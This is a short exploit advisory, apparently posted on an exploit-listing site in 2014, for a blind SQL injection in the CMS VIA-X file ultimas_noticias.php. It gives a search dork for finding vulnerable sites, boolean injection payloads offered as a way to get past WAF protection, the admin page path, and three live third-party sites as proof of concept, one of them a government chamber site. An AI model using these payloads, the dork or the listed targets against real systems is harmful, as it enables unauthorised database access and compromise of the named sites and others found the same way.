Home / exploitsPDF  

CMS VIA-X SQL Injection

Posted on 24 July 2014

[+] Blind Sql Injection on CMS VIA-X [+] Date: 23/07/2014 [+] CWE Number : CWE-89 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.viax.com.br/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: ultimas_noticias.php [+} Dork : inurl:ultimas_noticias.php?codnoticia= [+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection] ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection. [+] PoC: http://www.camaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37 http://www.vandelson.com.br/ultimas_noticias.php?codnoticia=53 http://www.fat.edu.br/ultimas_noticias.php?codnoticia=797 [+] Admin Page: http://host/admin/

 

TOP